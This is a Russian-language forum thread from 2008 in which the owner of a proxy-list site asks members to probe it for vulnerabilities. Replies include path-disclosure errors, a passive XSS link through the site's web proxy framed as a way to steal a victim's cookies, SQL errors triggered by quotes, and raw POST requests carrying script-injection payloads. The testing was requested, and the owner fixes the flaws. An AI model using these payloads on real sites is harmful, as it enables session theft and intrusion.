Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   2proxylife.net (https://forum.antichat.xyz/showthread.php?t=74225)

T-Rey 19.06.2008 11:39
2proxylife.net
 
Прошу проверить на уязвимость.
Ссылку проверки разместил.
Двиг самописный.

DIAgen 19.06.2008 20:47
Сайт заблокирован хостинг-провайдером!

1. Закончился срок оплаченного хостинга.
2. Были нарушены правила пользования хостингом.

halkfild 26.06.2008 13:35


Path Disclosure

Цитата:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in T:\home\virtual\2proxylife\init.php on line 2
тут вообще нет норм фильтрации

http://2proxylife.net/?req=proxy_info&id=1

Цитата:
Warning: gethostbyaddr() [function.gethostbyaddr]: Address is not in a.b.c.d form in T:\home\virtual\2proxylife\index.php on line 59
http://2proxylife.net/?req=proxy_info&id=10.10.10.10

Цитата:
Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on 'localhost' (10055) in T:\home\virtual\2proxylife\classes\mysql.php on line 13
Цитата:
=========================================
Время: 11:19:11
Сообщение от сервера: Can't connect to MySQL server on 'localhost' (10055)
IP Клиента: *.*.*.*
Запрос: MySQL Connect
но, похоже, это временное явление

+ еще тут

Цитата:
Warning: filemtime() [function.filemtime]: stat failed for ./checker.php in T:\home\virtual\2proxylife\index.php on line 78
з.ы. было бы время поковырял бы далее, а так исправляй ошибки

mr.The 26.06.2008 15:24
переходим сюда: _http://2proxylife.net/web/index.php?q=aHR0cDovL3hha2VwLm1vYmkvdGVzdC5odG1s&h l=1011101001
лицезреем наши куки.
алгоритм:
http://2proxylife.net/web/ - здесь снимаем птичку с "Отключить Scripts", а в поле адреса вписываем адрес на страницу с установленным на ней сниффером.
в даном случае просто
Цитата:
<html>
<script>alert(document.cookie);</script>
</html>
осталось только дать полученную ссылку(см. вверху) нашей жертве.
вот такая вот пасивная xss.

T-Rey 03.07.2008 08:56
Хоть и пасивка.. но, скрипт phproxy паблик... своё придумывать не стал.

Спасибо, ошибки исправил.

desTiny 03.07.2008 15:41
=========================================
Время: 15:39:31
Сообщение от сервера: Column 'icq' cannot be null
IP Клиента: X.X.X.X
Запрос: INSERT INTO `users` VALUES (null, '\'desTiny', '85c67a30aa831b696d10922cb1de4ab0', '0', '0', '0', null, 'ТУТ БЫЛО МЫЛО')

desTiny 03.07.2008 15:43
зарегался по данным
логин: 'desTiny
пасс: '123

Не заходит

add:
то же самое, если зарегаться с именем и пассом '

T-Rey 03.07.2008 15:45
Это не считается уязвимостью, я запретил нулевое значение в БД... однако фильтр ставить надо бы.
Спасибо,

Решение данной проблемы - нельзя оставлять пустые формы при регистрации, поставлю проверку перед импортом.

desTiny 03.07.2008 15:49
add:
"Текущее состояние: Неработает" - неправильно:
Текущее состояние: Не работает :)

Qwazar 03.07.2008 17:25
XSS в POST запросе:

Код:
Host: www.2proxylife.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.2proxylife.net/index.php?sort=siske&sortby=desc'
Cookie: PHPSESSID=ad8f11fbc8767bab42e87778c6c61003
Content-Type: application/x-www-form-urlencoded

m=user_check&proxy_list=</textarea><script>alert(/Hi/)</script>siske&pr_type=socks5&pr_timeout=10
SQL error:
Код:
Host: www.2proxylife.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.2proxylife.net/index.php?sort=siske&sortby=desc'
Cookie: PHPSESSID=ad8f11fbc8767bab42e87778c6c61003
Content-Type: application/x-www-form-urlencoded

m=user_check&proxy_list=&pr_type=siske&pr_timeout=10
Опечатки:
Код:
http://www.2proxylife.net/?req=getlist
"Не зарегистрировынным" -> "Незарегистрированным"
"uptame" -> "uptime"


Время: 02:37
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице